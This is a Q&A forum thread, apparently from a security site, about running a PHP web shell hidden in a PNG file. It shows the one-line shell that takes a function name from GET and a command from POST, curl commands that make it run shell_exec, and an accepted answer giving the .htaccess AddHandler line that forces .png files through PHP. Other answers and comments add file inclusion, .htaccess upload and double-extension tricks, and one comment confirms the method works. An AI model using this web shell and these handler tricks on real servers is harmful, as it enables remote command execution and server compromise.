# Execute PHP inside PNG using curl

Tags: php, shellcode

I'm doing some testing on executing remote PHP via PHP hidden inside a PNG file.
I've got a PNG file on my server with the following PHP code stored inside the PNG file.

```
<?=$_GET[0]($_POST[1]);?>
```

The idea being is that I pass a GET request with shell_exec OR exec function, followed by POST data 1 = the command to run.

I have been trying to use curl without success. I keep getting HTTP/1.1 404 not found.

```
curl http://192.168.0.6/phppng.png?0=shell_exec' -i -d "1=id"
```

Any ideas what can I use to send the GET request and include the POST data?

Comment: The PHP handler won't launch if the file extension is `.png`.

Comment: There is a legacy nginx misconfiguration which resulted in some non-PHP files being passed through the interpreter, although this has not applied to new installs for several years now.

Answer (score 5, accepted):

First of all, make sure that your webserver knows that it has to interpret PNG file as PHP. You need to add this to your `.htaccess` file.

```
AddHandler application/x-httpd-php .png
```

or

```
AddHandler application/x-httpd-php5 .png
```

Otherwise, it won't execute the PHP code.

Second, there's a syntax error in your curl request. You're missing a quote.

Try this:

```
curl -i -X POST "http://127.0.0.1/phppng.png?0=shell_exec" -d "1=id"
```

Answer (score 1):

Files ending in `.png` will not execute php code even if they contain php code. You can however execute this code either through a `LFI` or by uploading a `.htaccess` file which will add a php handler for .png or in the case of Apache you could use a double file extansion, ie: `phppng.php.phppng`.

Comment: And if you can upload a .htaccess file you can just do this instead: https://github.com/wireghoul/htshells

Comment: Can you give more info on the the double file extension thing?

Comment: There isn't really any good reference docummentation apart from mod_mime itself, which can be found here; https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext

Comment: I must admit I was a bit skeptical - but this looks viable / interesting / scary.

Comment: Just tested it and it works (i.e. is exploitable).

Comment: I'm glad you learned something new/useful :)